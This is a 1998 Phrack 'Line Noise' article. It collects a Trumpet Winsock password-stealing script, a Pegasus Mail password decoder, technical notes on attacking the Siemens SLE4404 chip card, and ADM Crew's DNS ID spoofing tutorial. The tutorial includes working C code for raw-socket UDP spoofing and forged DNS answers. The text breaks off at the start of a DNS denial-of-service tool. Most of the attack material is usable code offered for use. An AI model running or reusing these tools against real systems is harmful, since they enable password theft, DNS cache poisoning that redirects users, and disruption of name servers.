Copy Link
Add to Bookmark
Report
Phrack Inc. Volume 08 Issue 52 File 03
---[ Phrack Magazine Volume 8, Issue 52 January 26, 1998, article 03 of 20
-------------------------[ P H R A C K 5 2 L I N E N O I S E
--------[ Various
0x1>-------------------------------------------------------------------------
Upon discovering Doctor Jeep's "Trumpet Winsock Password Hacker" in P51-03, I
felt obligated to share a small piece of code that I don't like to admit
that I created, far earlier than the esteemed Jeep's published work. As his
requires access to a Pascal compiler and does not seem to be coded with
portability in mind, the fact that my script requires Trumpet itself to run
does not seem too great a hindrance. The irony is that not only is the
"cipher" a simple obfuscating XOR, but that Trumpet itself will decode it
for you.
<++> password.cmd
# Put in Trumpet Winsock directory, run under "Dialer/Other"
# Cannot currently use any file other than trumpwsk.ini,
# apparently due to implementation errors in the "load" function
display \n
display "Trumpet Password Thief 1.0, 8-18-95"\n
display \n
if [load $username]
display "username: "
display $username\n
else
display "ERR: cannot load username"\n
end
if [load $password]
display "password: "
display $password\n
else
display "ERR: cannot load password"\n
end
display \n
<-->
- anonymous
0x2>-------------------------------------------------------------------------
Another password decoder for ya... written long ago, I just never bothered to
release it...
<++> peg-dec.c
/*
* Pegasus Mail Password Decoder v1.0 by Belgorath
*/
#include <stdio.h>
/* Decoding/Encoding Tables */
int dec1[1]= { 44 };
int dec2[2]= { 16, 21 };
int dec3[3]= { 10, 22, 28 };
int dec4[4]= { 37, 28, 21, 7 };
int dec5[5]= { 21, 22, 37, 28, 9 };
int dec6[6]= { 22, 15, 28, 42, 17, 2 };
int dec7[7]= { 15, 17, 21, 31, 0, 12, 19 };
int dec8[8]= { 9, 2, 7, 20, 44, 22, 28, 23 };
int *decz[8] = { dec1,dec2,dec3,dec4,dec5,dec6,dec7,dec8 };
int decode_char(int numch, int ch, int pos)
{
ch-=decz[numch-1][pos-1];
if(ch<-127) ch+=256;
return ch;
}
void main(void)
{
int zz,x,nc;
char *tz;
int inps[20];
nc=0;
tz=malloc(8192);
printf("Enter Pegasus Mail Password: ");
gets(tz);
/* Fun input parsing loop. Hope your malloc bzero's... */
while( *tz ) {
for(x=0;x<strlen(tz)+2;x++) {
if( (tz[x]==' ') || (tz[x]==0) ) {
tz[x]=0;
inps[nc]=atoi(tz);
nc++;
tz+=x+1;
break;
}
}
}
/* Throw away anything past the end */
for(x=0;x<nc;x++) if(inps[x]==-1) nc=x+1;
/* All pegasus passwords end in -1 */
if(inps[nc-1]!=-1) {
printf("Invalid Pegasus Mail Password.\n");
return;
}
/* But we throw it away anyway */
nc--;
printf("Decoded Password: [");
for(x=1;x<nc+1;x++) putchar(decode_char(nc,inps[x-1],x));
printf("]\n");
}
<-->
0x3>-------------------------------------------------------------------------
:----------------------------:
Siemens Chip Card Technology
. by Yggdrasil .
:----------------------------:
Chip cards differ from one another in memory size, type of memory (PROM or
EEPROM), security logic and micro-controller. This article will discuss the
Siemens SLE4404 chip card technology.
The SLE4404 is employed for electronic purse cards and bank transactions,
cellular telephony (pre-payed cards), user IDs for access control, etc. (some
examples: SmartCard, ViaCard and Italian Bancomat). Its data can be accessed
through a simple TTL serial channel, providing a +5 Vcc power supply from an
external source.
Inside the chip
~~~~~~~~~~~~~~~
The chipcard has at its disposal EEPROM memory consisting of a 416-bit matrix
(each row is 16-bits) that is protected by security logic providing access
control.
This is the logic diagram:
+------------------------+ +------------------+
| Address Counter | --> | Column Decoder |
+------------------------+ +------------------+
^ | | 16
| v v
+-----------+ +---------+ +------------------+
C3,C8,C2,C5 --> | Control & | | Row | | User mem 208 bit |
C1 (Vcc) --> | Security | | Decoder | --> | Sec unit 192 bit |
C7 (I/O) <--> | Logic | | | 26 | Special mem unit |
+-----------+ +---------+ +------------------+
^ ^
| |
+----------------------------------+
The SLE4404 memory is subdivided in three main memory blocks: one is read
only (a "PROM" containing the manufacturer code and/or a serial number and
an expiration date), the second is both readable and writeable (user memory)
and the last block cannot be written to unless the lock-out fuse has been
fused.
This is the memory map:
BLOCK TYPE SIZE (BIT) ADDRESS READABLE WRITEABLE ERASEABLE
-----------------------------------------------------------------------------
Manufacturer code 16 0-15 Yes No No
Application ROM 48 16-63 Yes No No
User code 16 64-79 [fuse] U.C. U.C.
Error counter 4 80-83 Yes Yes U.C.
EEPROM #1 12 84-95 Yes Yes U.C.
EEPROM #2 16 96-111 Yes U.C. U.C.
Frame memory block
- F.M. config 2 112-113 Yes Yes U.C./R.C.
- Frame memory 206 114-319 [cfg] [cfg] U.C./R.C.
Frame code 32 320-351 [fuse] [fuse] [cfg]
Frame counter 64 352-415 Yes Yes [cfg]
-----------------------------------------------------------------------------
Meaning of abbreviations:
U.C. - User code required
(each time the code is entered the error counter is decreased)
R.C. - Frame code required
(each time the code is entered the frame counter is decreased)
[fuse] - Operation allowed ONLY IF lock-out fuse is not fused
[cfg] - Operation allowed according to frame memory configuration
Frame memory configuration table:
BIT 112 BIT 113 MEMORY MODE READABLE WRITEABLE
-----------------------------------------------------------------------------
0 0 Secret ROM Yes No
0 1 R.O.M. Yes No
1 0 Secret PROM U.C. U.C.
1 1 P.R.O.M. U.C. U.C.
-----------------------------------------------------------------------------
The first 16-bit block is for the Manufacturer Code. The following 48-bit
block is called Application ROM, containing another code (Manufacturer sub
code or info, serial number, sub-type of card, etc).
The User Code is the access code (PIN) used to read/write/erase memory.
This code can be modified provided that the fuse was not fused, while the
error counter value can be modified even if the fuse was fused...
Please note that access to memory is blocked after four incorrect access
trials (checked by the counter). The same is for the Frame Code and the
Frame [error] Counter (note that the number of incorrect accesses is limited
to three trials instead of four).
Finally, the Frame Memory is generally used for storing personal user
information or the credit limit (money that can be fetched in a bank
transaction, or the remaining "virtual" credit that a pre-payed cellular card
contains).
The Pin-out
~~~~~~~~~~~
This is the Siemens SLE4404 pin-out (N.C. stands for Not Connected):
+-------+-------------------+
| C 1 | C 5 | Contact Pin Info
| | |
+-------+ +-------+ 1 6 Vcc +5V
| C 2 | | C 6 | 2 5 Reset
| | | | 3 4 Clock
+-------+ +-------+ 4 3 Test input - N.C.
| C 3 | | C 7 | 5 8 Ground
| | | | 6 7 N.C.
+-------+ +-------+ 7 1 Bi-directional I/O data line
| C 4 | | C 8 | 8 2 Control input (data change)
| | | |
+-------+-----------+-------+
"I am for ever walking upon these shores,
betwixt the sand and the foam.
The high tide will erase my foot-prints,
and the wind will blow away the foam.
But the sea and the shore will remain
For ever."
-- Gibran K. Gibran
0x4>-------------------------------------------------------------------------
___ ______ _ _
/ \ | _ \ | \ / |
| / \ | | | \ | | \_/ |
| |___| | | |_ / | | \_/ |
..oO THE | --- | | / | | | | CreW Oo..
''' ''' ''''''' '''' ''''
presents
DNS ID Hacking
--[1]-- DNS ID Hacking Presentation
You might be wondering what DNS ID Hacking (or Spoofing) is all about. DNS ID
Hacking isn't a usual way of hacking/spoofing such jizz or any-erect. This
method is based on a vulnerability on DNS Protocol. More brutal, the DNS ID
hack/spoof is very efficient and very strong as there is no generation of DNS
daemons that escapes from it (even WinNT!).
--[1.1]-- DNS Protocol mechanism explanation
In the first step, you must know how the DNS works. I will only explain the
most important facts of this protocol. In order to do that, we will follow
the way of a DNS request packet from A to Z!
Name resolution example:
The client (bla.bibi.com) sends a request of resolution of the domain
"www.heike.com". To resolve the name, bla.bibi.com uses "dns.bibi.com" for
DNS. Let's take a look at the following picture..
/---------------------------------\
| 111.1.2.123 = bla.bibi.com |
| 111.1.2.222 = dns.bibi.com |
| format: |
| IP_ADDR:PORT->IP_ADDR:PORT |
| ex: |
| 111.1.2.123:2999->111.1.2.222:53|
\---------------------------------/
...
gethosbyname("www.heike.com");
...
[bla.bibi.com] [dns.bibi.com]
111.1.2.123:1999 ---> [?www.heike.com] ------> 111.1.2.222:53
Here we see our resolution name request from source port 1999 which is asking
to DNS on port 53 (note: DNS is always on port 53). Now that dns.bibi.com has
received the resolution request from bla.bibi.com, dns.bibi.com will have to
resolve the name:
[dns.bibi.com] [ns.internic.net]
111.1.2.222:53 --------> [dns?www.heike.com] ----> 198.41.0.4:53
dns.bibi.com asks ns.internic.net who the root name server for the address
of www.heike.com is, and if it doesn't have it and sends the request to a name
server which has authority on '.com' domains (note: we send a request to the
Internic because it could have this request in its cache).
[ns.internic.net] [ns.bibi.com]
198.41.0.4:53 ------> [ns for.com is 144.44.44.4] ------> 111.1.2.222:53
Here we can see that ns.internic.net answered to ns.bibi.com (which is the DNS
that has authority over the domain bibi.com), that the name server of for.com
has the IP 144.44.44.4 (let's call it ns.for.com). Now our ns.bibi.com will
ask to ns.for.com for the address of www.heike.com, but this one doesn't have
it and will forward the request to the DNS of heike.com which has authority
for heike.com.
[ns.bibi.com] [ns.for.com]
111.1.2.222:53 ------> [?www.heike.com] -----> 144.44.44.4:53
The answer from ns.for.com:
[ns.for.com] [ns.bibi.com]
144.44.44.4:53 ------>[ns for heike.com is 31.33.7.4] ---> 144.44.44.4:53
Now that we know which IP address has authority on the domain "heike.com"
(we'll call it ns.heike.com), we ask it what's the IP of the machine
www.heike.com.
[ns.bibi.com] [ns.heike.com]
111.1.2.222:53 -----> [?www.heike.com] ----> 31.33.7.4:53
We now have our answer:
[ns.heike.com] [ns.bibi.com]
31.33.7.4:53 -------> [www.heike.com == 31.33.7.44] ----> 111.1.2.222:53
Great we have the answer, we can forward it to our client bla.bibi.com.
[ns.bibi.com] [bla.bibi.com]
111.1.2.222:53 -------> [www.heike.com == 31.33.7.44] ----> 111.1.2.123:1999
Now bla.bibi.com knows the IP of www.heike.com.
Now let's imagine that we'd like to have the name of a machine from its IP, in
order to do that, we proceed a bit differently as the IP will have to be
transformed.
Reverse name lookup resolution:
100.20.40.3 will become 3.40.20.100.in-addr.arpa
This method is only for the IP resolution request (reverse DNS).
Let's look at a practical example of when we take the IP address of
www.heike.com (31.33.7.44 or "44.7.33.31.in-addr.arpa" after the translation
into a comprehensible format by DNS).
...
gethostbyaddr("31.33.7.44");
...
We send our request to ns.bibi.com:
[bla.bibi.com] [ns.bibi.com]
111.1.2.123:2600 -----> [?44.7.33.31.in-addr.arpa] -----> 111.1.2.222:53
Which is forwarded to ns.internic.net:
[ns.bibi.com] [ns.internic.net]
111.1.2.222:53 -----> [?44.7.33.31.in-addr.arpa] ------> 198.41.0.4:53
ns.internic.net will send the IP of a name server which has authority on
'31.in-addr.arpa'.
[ns.internic.net] [ns.bibi.com]
198.41.0.4:53 --> [DNS for 31.in-addr.arpa is 144.44.44.4] -> 111.1.2.222:53
Now ns.bibi.com will ask the same question to the DNS at 144.44.44.4:
[ns.bibi.com] [ns.for.com]
111.1.2.222:53 ----->[?44.7.33.31.in-addr.arpa]------> 144.44.44.4:53
And so on. The mechanism is nearly the same that was used for name resolution.
--[1.2]-- DNS packet header
Here is the format of a DNS message :
+---------------------------+---------------------------+
| ID (the famous :) | flags |
+---------------------------+---------------------------+
| numbers of questions | numbers of answer |
+---------------------------+---------------------------+
| number of RR authority |number of supplementary RR |
+---------------------------+---------------------------+
| |
\ \
\ QUESTION \
| |
+-------------------------------------------------------+
| |
\ \
\ ANSWER \
| |
+-------------------------------------------------------+
| |
\ \
\ Stuff etc.. No matter \
| |
+-------------------------------------------------------+
--[1.3]-- Structure of DNS packets.
__ID__
The ID permits us to identify each DNS packet, since exchanges between name
servers are from port 53 to port 53, and more it might be more than one
request at a time, so the ID is the only way to recognize the different DNS
requests. Well talk about it later..
__flags__
The flags area is divided into several parts :
4 bits 3 bits (always 0)
| |
| |
[QR | opcode | AA| TC| RD| RA | zero | rcode ]
|
| |__|__|__| |______ 4 bits
| |_ 1 bit
|
1 bit
QR = If the QR bit = 0, it means that the packet is a question, otherwise
it's an answer.
opcode = If the value is 0 for a normal request, 1 for a reserve request, and
2 for a status request (we don't need to know all these modes).
AA = If it's equal to 1, it says that the name server has an authoritative
answer.
TC = No matter
RD = If this flag is to 1, it means "Recursion Request", for example when
bla.bibi.com asks ns.bibi.com to resolve the name, the flag tells the
DNS to assume this request.
RA = If it's set to 1, it means that recursion is available. This bit is
set to 1 in the answer of the name server if it supports recursion.
Zero = Here are three zeroes...
rcode = It contains the return error messages for DNS requests if 0, it means
"no error", 3 means "name error"
The 2 following flags don't have any importance for us.
DNS QUESTION:
Here is the format of a DNS question :
+-----------------------------------------------------------------------+
| name of the question |
+-----------------------------------------------------------------------+
| type of question | type of query |
+--------------------------------+--------------------------------------+
The structure of the question is like this.
example:
www.heike.com will be [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0]
for an IP address, the format remains the same.
44.33.88.123.in-addr.arpa would be:
[2|4|4|2|3|3|2|8|8|3|1|2|3|7|i|n|-|a|d|d|r|4|a|r|p|a|0]
[note]: a compression format exists, but we won't cover it.
type of question:
Here are the values that we will use much of the time (there are many more,
but these are only ones relevant):
name value
A | 1 | IP Address (resolving a name to an IP)
PTR | 12 | Pointer (resolving an IP to a name)
type of query:
The values are the same as the type of question.
DNS ANSWER:
Here is the format of an answer (an RR)
+------------------------------------------------------------------------+
| name of the domain |
+------------------------------------------------------------------------+
| type | class |
+----------------------------------+-------------------------------------+
| TTL (time to live) |
+------------------------------------------------------------------------+
| resource data length | |
|----------------------------+ |
| resource data |
+-------------------------------------------------------------------------
name of the domain:
The name of the domain in reports to the following resource: The domain name
is stored in the same way that the part question for the resolution request of
www.heike.com, the flag "name of the domain" will contain
[3|w|w|w|5|h|e|i|k|e|3|c|o|m|0].
type:
The type flag is the same than "type of query" in the question part of the
packet.
class:
The class flag is equal to 1 for Internet data.
time to live:
This flag explains in seconds the time-life of the information into the
name server cache.
resource data length:
The length of resource data, for example if resource data length is 4, it
means that the data in resources data are 4 bytes long.
resource data:
here we put the IP for example (at least in our case)
I will offer you a little example that explains this better:
Here is what's happening when ns.bibi.com asks ns.heike.com for
www.heike.com's address
ns.bibi.com:53 ---> [?www.heike.com] ----> ns.heike.com:53 (Phear Heike ;)
+---------------------------------+--------------------------------------+
| ID = 1999 | QR = 0 opcode = 0 RD = 1 |
+---------------------------------+--------------------------------------+
| numbers of questions = htons(1) | numbers of answers = 0 |
+---------------------------------+--------------------------------------+
| number of RR authoritative = 0 | number of supplementary RR = 0 |
+---------------------------------+--------------------------------------+
<the question part>
+------------------------------------------------------------------------+
| name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] |
+------------------------------------------------------------------------+
| type of question = htons(1) | type of query=htons(1) |
+---------------------------------+--------------------------------------+
here is for the question.
now let's stare the answer of ns.heike.com
ns.heike.com:53 -->[IP of www.heike.com is 31.33.7.44] --> ns.bibi.com:53
+---------------------------------+---------------------------------------+
| ID = 1999 | QR=1 opcode=0 RD=1 AA =1 RA=1 |
+---------------------------------+---------------------------------------+
| numbers of questions = htons(1) | numbers of answers = htons(1) |
+---------------------------------+---------------------------------------+
| number of RR authoritative = 0 | number of supplementary RR = 0 |
+---------------------------------+---------------------------------------+
+-------------------------------------------------------------------------+
| name of the question = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] |
+-------------------------------------------------------------------------+
| type of question = htons(1) | type of query = htons(1) |
+-------------------------------------------------------------------------+
+-------------------------------------------------------------------------+
| name of the domain = [3|w|w|w|5|h|e|i|k|e|3|c|o|m|0] |
+-------------------------------------------------------------------------+
| type = htons(1) | class = htons(1) |
+-------------------------------------------------------------------------+
| time to live = 999999 |
+-------------------------------------------------------------------------+
| resource data length = htons(4) | resource data=inet_addr("31.33.7.44") |
+-------------------------------------------------------------------------+
Yah! That's all for now :))
Here is an analysis:
In the answer QR = 1 because it's an answer :)
AA = 1 because the name server has authority in its domain
RA = 1 because recursion is available
Good =) I hope you understood that cause you will need it for the following
events.
--[2.0]-- DNS ID hack/spoof
Now it's time to explain clearly what DNS ID hacking/spoofing is.
Like I explained before, the only way for the DNS daemon to recognize
the different questions/answers is the ID flag in the packet. Look at this
example:
ns.bibi.com;53 ----->[?www.heike.com] ------> ns.heike.com:53
So you only have to spoof the ip of ns.heike.com and answer your false
information before ns.heike.com to ns.bibi.com!
ns.bibi.com <------- . . . . . . . . . . . ns.heike.com
|
|<--[IP for www.heike.com is 1.2.3.4]<-- hum.roxor.com
But in practice you have to guess the good ID :) If you are on a LAN, you
can sniff to get this ID and answer before the name server (it's easy on a
Local Network :)
If you want to do this remotely you don't have a lot a choices, you only
have 4 basics methods:
1.) Randomly test all the possible values of the ID flag. You must answer
before the ns ! (ns.heike.com in this example). This method is obsolete
unless you want to know the ID .. or any other favorable condition to
its prediction.
2.) Send some DNS requests (200 or 300) in order to increase the chances
of falling on the good ID.
3.) Flood the DNS in order to avoid its work. The name server will crash
and show the following error!
>> Oct 06 05:18:12 ADM named[1913]: db_free: DB_F_ACTIVE set - ABORT
at this time named daemon is out of order :)
4.) Or you can use the vulnerability in BIND discovered by SNI (Secure
Networks, Inc.) with ID prediction (we will discuss this in a bit).
##################### Windows ID Vulnerability ###########################
I found a heavy vulnerability in Windows 95 (I haven't tested it on
WinNT), lets imagine my little friend that's on Windows 95.
Windows ID's are extremely easy to predict because it's "1" by default :)))
and "2" for the second question (if they are 2 questions at the same time).
######################## BIND Vulnerability ##############################
There is a vulnerability in BIND (discovered by SNI as stated earlier).
In fact, DNS IS are easily predictable, you only have to sniff a DNS in
order to do what you want. Let me explain...
The DNS uses a random ID at the beginning but it only increase this ID for
next questions ... =)))
It's easy to exploit this vulnerability.
Here is the way:
1. Be able to sniff easily the messages that comes to a random DNS (ex.
ns.dede.com for this sample).
2. You ask NS.victim.com to resolve (random).dede.com. NS.victim.com will
ask to ns.dede.com to resolve (random).dede.com
ns.victim.com ---> [?(rand).dede.com ID = 444] ---> ns.dede.com
3. Now you have the ID of the message from NS.victim.com, now you know what
ID area you'll have to use. (ID = 444 in this sample).
4. You then make your resolution request. ex. www.microsoft.com to
NS.victim.com
(you) ---> [?www.microsoft.com] ---> ns.victim.com
ns.victim.com --> [?www.microsoft.com ID = 446 ] --> ns.microsoft.com
5. Flood the name server ns.victim.com with the ID (444) you already have and
then you increase this one.
ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 444] --> ns.victim.com
ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 445] --> ns.victim.com
ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 446] --> ns.victim.com
ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 447] --> ns.victim.com
ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 448] --> ns.victim.com
ns.microsoft.com --> [www.microsoft.com = 1.1.1.1 ID = 449] --> ns.victim.com
(now you know that DNS IDs are predictable, and they only increase. You
flood ns.victim.com with spoofed answers with the ID 444+ ;)
*** ADMsnOOfID does this.
There is another way to exploit this vulnerability without a root on
any DNS
The mechanism is very simple. Here is the explanation
We send to ns.victim.com a resolution request for *.provnet.fr
(you) ----------[?(random).provnet.fr] -------> ns.victim.com
Then, ns.victim.com asks ns1.provnet.fr to resolve (random).provnet.fr.
There is nothing new here, but the interesting part begins here.
From this point you begin to flood ns.victim.com with spoofed answers
(with ns1.provnet.fr IP) with ids from 100 to 110...
(spoof) ----[(random).provnet.fr is 1.2.3.4 ID=100] --> ns.victim.com
(spoof) ----[(random).provnet.fr is 1.2.3.4 ID=101] --> ns.victim.com
(spoof) ----[(random).provnet.fr is 1.2.3.4 ID=102] --> ns.victim.com
(spoof) ----[(random).provnet.fr is 1.2.3.4 ID=103] --> ns.victim.com
.....
After that, we ask ns.victim.com if (random).provnet.fr has an IP.
If ns.victim.com give us an IP for (random).provnet.fr then we have
found the correct ID :) Otherwise we have to repeat this attack until we
find the ID. It's a bit long but it's effective. And nothing forbids you
to do this with friends ;)
This is how ADMnOg00d works ;)
-------------------------------
##########################################################################
Here you will find 5 programs
ADMkillDNS - very simple DNS spoofer
ADMsniffID - sniff a LAN and reply false DNS answers before the NS
ADMsnOOfID - a DNS ID spoofer (you'll need to be root on a NS)
ADMnOg00d - a DNS ID predictor (no need to be root on a NS)
ADNdnsfuckr - a very simple denial of service attack to disable DNS
Have fun!! :)
Note: You can find source and binaries of this progs at
ftp.janova.org/pub/ADM. I'm going to make a little HOWTO soon, which would
be on janova. You need to install libpcap on your machine before any
compilation of the ADMID proggies :)
ADM Crew.
Thanks to: all ADM crew, Shok, pirus, fyber, Heike, and w00w00 (gotta love
these guys)
Special Thanks: ackboo, and of course Secure Networks, Inc. (SNI) at
www.secnet.com for finding the vulnerability =)
<++> ADMIDpack/ADM-spoof.c
/************************************************************************/
/* ADM spoofing routine for spoof udp */
/************************************************************************/
#define IPHDRSIZE sizeof(struct iphdr)
#define UDPHDRSIZE sizeof(struct udphdr)
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <memory.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <netdb.h>
#include <netinet/in.h>
#include "ip.h"
#include "udp.h"
/*****************************************************************************/
/*
* in_cksum --
* Checksum routine for Internet Protocol family headers (C Version)
*/
/*****************************************************************************/
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}
int udp_send(s,saddr,daddr,sport,dport,datagram,datasize)
int s;
unsigned long saddr;
unsigned long daddr;
unsigned short sport;
unsigned short dport;
char * datagram;
unsigned datasize;
{
struct sockaddr_in sin;
struct iphdr *ip;
struct udphdr *udp;
unsigned char *data;
unsigned char packet[4024];
int x;
ip = (struct iphdr *)packet;
udp = (struct udphdr *)(packet+IPHDRSIZE);
data = (unsigned char *)(packet+IPHDRSIZE+UDPHDRSIZE);
memset(packet,0,sizeof(packet));
udp->source = htons(sport);
udp->dest = htons(dport);
udp->len = htons(UDPHDRSIZE+datasize);
udp->check = 0;
memcpy(data,datagram,datasize);
memset(packet,0,IPHDRSIZE);
ip->saddr.s_addr = saddr;
ip->daddr.s_addr = daddr;
ip->version = 4;
ip->ihl = 5;
ip->ttl = 245;
ip->id = random()%5985;
ip->protocol = IPPROTO_UDP;
ip->tot_len = htons(IPHDRSIZE + UDPHDRSIZE + datasize);
ip->check = 0;
ip->check = in_cksum((char *)packet,IPHDRSIZE);
sin.sin_family=AF_INET;
sin.sin_addr.s_addr=daddr;
sin.sin_port=udp->dest;
x=sendto(s, packet, IPHDRSIZE+UDPHDRSIZE+datasize, 0,
(struct sockaddr*)&sin, sizeof(struct sockaddr));
return(x);
}
/*****************************************************************************/
/* RECV PAKET */
/* get_pkt(socket, *buffer , size of the buffer); */
/*****************************************************************************/
int get_pkt(s,data,size)
int s;
unsigned char *data;
int size;
{
struct sockaddr_in sin;
int len,resu;
len= sizeof(sin);
resu=recvfrom(s,data,size,0,(struct sockaddr *)&sin,&len);
return resu;
}
<-->
<++> ADMIDpack/ADMDNS2.c
/*************************************************/
/* DNS include for play with DNS packet (c) ADM */
/*************************************************/
#define ERROR -1
#define DNSHDRSIZE 12
#define TYPE_A 1
#define TYPE_PTR 12
int myrand()
{
int j;
j=1+(int) (150.0*rand()/(RAND_MAX+1.0));
return(j);
}
unsigned long host2ip(char *serv)
{
struct sockaddr_in sinn;
struct hostent *hent;
hent=gethostbyname(serv);
if(hent == NULL) return 0;
bzero((char *)&sinn, sizeof(sinn));
bcopy(hent->h_addr, (char *)&sinn.sin_addr, hent->h_length);
return sinn.sin_addr.s_addr;
}
void nameformat(char *name,char *QS)
{
/* CRAP & LAme COde :) */
char lol[3000];
char tmp[2550];
char tmp2[2550];
int i,a=0;
bzero(lol,sizeof(lol));
bzero(tmp,sizeof(tmp));
bzero(tmp2,sizeof(tmp2));
for(i=0;i<strlen(name);i++)
{
if( *(name+i) == '.' ){
sprintf(tmp2,"%c%s",a,tmp);
strcat(lol,tmp2);
bzero(tmp,sizeof(tmp));
bzero(tmp2,sizeof(tmp2));
a=0;
}
else tmp[a++] = *(name+i);
}
sprintf(tmp2,"%c%s",a,tmp);
strcat(lol,tmp2);
strcpy(QS,lol);
}
void nameformatIP(char *ip, char *resu)
{
char *arpa = "in-addr.arpa";
char bla[255];
char arf[255];
char haha[255];
char c;
char *A[4];
int i,a=3,k=0;
bzero(bla,sizeof(bla));
bzero(arf,sizeof(arf));
bzero(haha,sizeof(haha));
for(i=0;i<4;i++){
A[i] =(char *)malloc(4);
bzero(A[i],4);
}
bzero(bla,sizeof(bla));
bzero(arf,sizeof(arf));
for(i=0;i<strlen(ip);i++)
{
c = ip[i];
if( c == '.'){
strcat(A[a],arf);
a--;
k=0;
bzero(arf,sizeof(arf));
}
else arf[k++] = c;
}
strcat(A[a],arf);
for(i=0;i<4;i++){
strcat(bla,A[i]);
strcat(bla,".");
}
strcat(bla,arpa);
nameformat(bla,haha);
strcpy(resu,haha);
}
int makepaketQS(char *data,char *name,int type)
{
if(type == TYPE_A ){
nameformat(name,data);
*( (u_short *) (data+strlen(data)+1) ) = htons(TYPE_A);
}
if(type == TYPE_PTR){
nameformatIP(name,data);
*( (u_short *) (data+strlen(data)+1) ) = htons(TYPE_PTR);
}
*( (u_short *) (data+strlen(data)+3) ) = htons(1);
return(strlen(data)+5);
}
int makepaketAW(char *data,char *name, char *ip,int type)
{
int i;
char tmp[2550];
bzero(tmp,sizeof(tmp));
if( type == TYPE_A ){
nameformat(name,data);
*( (u_short *) (data+strlen(data)+1) ) = htons(1);
*( (u_short *) (data+strlen(data)+3) ) = htons(1);
i=strlen(data)+5;
strcpy(data+i,data);
i=i+strlen(data)+1;
*((u_short *) (data+i)) = htons(TYPE_A);
*((u_short *) (data+i+2)) = htons(1);
*((u_long *) (data+i+4)) = 9999999;
*((u_short *) (data+i+8)) = htons(4);
*((u_long *) (data+i+10)) = host2ip(ip);
return(i+14);
}
if( type == TYPE_PTR ){
nameformat(name,tmp);
nameformatIP(ip,data);
*( (u_short *) (data+strlen(data)+1) ) = htons(TYPE_PTR);
*( (u_short *) (data+strlen(data)+3) ) = htons(1);
i=strlen(data)+5;
strcpy((data+i),data);
i=(i+strlen(data)+1);
*((u_short *) (data+i)) = htons(TYPE_PTR);
*((u_short *) (data+i+2)) = htons(1);
*((u_long *) (data+i+4)) = 9999999;
*((u_short *) (data+i+8)) = htons(strlen(tmp)+1);
strcpy((data+i+10),tmp);
return(i+10+strlen(tmp)+1);
}
}
void sendquestion(u_long s_ip, u_long d_ip,char *name,int type)
{
struct dnshdr *dns;
char buff[1024];
char *data;
int i;
int on=1;
int sraw;
if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
perror("socket");
exit(ERROR);
}
if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR)if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
perror("setsockopt");
exit(ERROR);
}
dns = (struct dnshdr *) buff;
data = (char *)(buff+DNSHDRSIZE);
bzero(buff,sizeof(buff));
dns->id = 6000+myrand();
dns->qr = 0;
dns->rd = 1;
dns->aa = 0;
dns->que_num = htons(1);
dns->rep_num = htons(0);
i=makepaketQS(data,name,type);
udp_send(sraw,s_ip,d_ip,1200+myrand,53,buff,DNSHDRSIZE+i);
close(sraw);
}
void sendawnser(u_long s_ip, u_long d_ip, char *name,char *spoofip,int ID,int type)
{
struct dnshdr *dns;
char buff[1024];
char *data;
int i;
int on=1;
int sraw;
if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){
perror("socket");
exit(ERROR);
}
if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR)if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){
perror("setsockopt");
exit(ERROR);
}
dns = (struct dnshdr *) buff;
data = (char *)(buff+DNSHDRSIZE);
bzero(buff,sizeof(buff));
dns->id = htons(ID);
dns->qr = 1;
dns->rd = 1;
dns->aa = 1;
dns->que_num = htons(1);
dns->rep_num = htons(1);
i=makepaketAW(data,name,spoofip,type);
printf(" I apres Makepaket == %i \n",i);
udp_send(sraw,s_ip,d_ip,53,53,buff,DNSHDRSIZE+i);
close(sraw);
}
void dnsspoof(char *dnstrust,char *victim,char *spoofname,char *spoofip,int ID,int type)
{
struct dnshdr *dns;
char buff[1024];
char *data;
u_long fakeip;
u_long trustip;
u_long victimip;
int loop,rere;
dns = (struct dnshdr *)buff;
data = (char *)(buff+DNSHDRSIZE);
trustip = host2ip(dnstrust);
victimip = host2ip(victim);
fakeip = host2ip("12.1.1.0");
/* send question ... */
if( type == TYPE_PTR)
for(loop=0;loop<4;loop++)sendquestion(fakeip,victimip,spoofip,type);
if( type == TYPE_A)
for(loop=0;loop<4;loop++)
sendquestion(fakeip,victimip,spoofname,type);
/* now its time to awnser Quickly !!! */
for(rere = 0; rere < 2;rere++){
for(loop=0;loop < 80;loop++){
printf("trustip %s,vitcimip %s,spoofna %s,spoofip %s,ID %i,type %i\n",
dnstrust,victim,spoofname,spoofip,ID+loop,type);
sendawnser(trustip,victimip,spoofname,spoofip,ID+loop,type);
}
}
}
<-->
<++> ADMIDpack/ADMdnsfuckr.c
/* ADM DNS DESTROYER */
#define DNSHDRSIZE 12
#define VERSION "0.2 pub"
#define ERROR -1
#include <stdio.h>
#include <stdlib.h>
